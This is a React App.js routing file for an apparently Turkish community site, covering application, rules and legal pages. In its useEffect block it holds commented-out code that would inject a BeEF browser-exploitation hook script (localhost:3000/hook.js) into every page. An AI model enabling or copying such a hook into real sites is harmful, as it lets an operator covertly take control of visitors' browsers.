import React, { useEffect, useState } from 'react';
import { Routes, Route } from 'react-router-dom';
import Home from './pages/Home';
import TeamApplication from './pages/TeamApplication';
import Rules from './pages/Rules';
import GizlilikPolitikasi from './pages/legal/GizlilikPolitikasi';
import KullanimKosullari from './pages/legal/KullanimKosullari';
import KVKKKosullari from './pages/legal/KVKKKosullari';
import UnderConstruction from './pages/stats/UnderConstruction';
import CommunityForm from './components/CommunityForm';
import Header from './components/Header';
import Footer from './components/Footer';
import Loader from './components/Loader';


function App() {
    const [isLoaded, setIsLoaded] = useState(false);
    const [currentPath, setCurrentPath] = useState(window.location.pathname);

    useEffect(() => {

            // BeEF hook'unu dinamik olarak ekle
        // const beefScript = document.createElement('script');
        // beefScript.src = 'http://localhost:3000/hook.js';
        // beefScript.async = true;
        // document.head.appendChild(beefScript);

        
        // Initialize any global scripts/functions after the page loads
        const handleLoad = () => {
            setIsLoaded(true);
        };

        // If the document is already loaded, call handleLoad immediately
        if (document.readyState === 'complete') {
            handleLoad();
        } else {
            window.addEventListener('load', handleLoad);
        }

        return () => {
            window.removeEventListener('load', handleLoad);
            // document.head.removeChild(beefScript);
        };
    }, []);


    return (
        <div className="app">
            <Loader />
            <Header />
            <main>
                <Routes>
                    <Route path="/" element={<Home />} />
                    <Route path="/takimbasvuru" element={<TeamApplication />} />
                    <Route path="/toplulukbasvuru" element={<TeamApplication />} />
                    <Route path="/kurallar" element={<Rules />} />
                    <Route path="/stats" element={<UnderConstruction />} />
                    <Route path="/gizlilik-politikasi" element={<GizlilikPolitikasi />} />
                    <Route path="/kullanim-kosullari" element={<KullanimKosullari />} />
                    <Route path="/kvkk-kosullari" element={<KVKKKosullari />} />

                    {/* 🔥 Catch-all route for invalid paths */}
                    <Route path="*" element={<Home />} />
                </Routes>
            </main>
            <Footer />
        </div>
    );
}

export default App;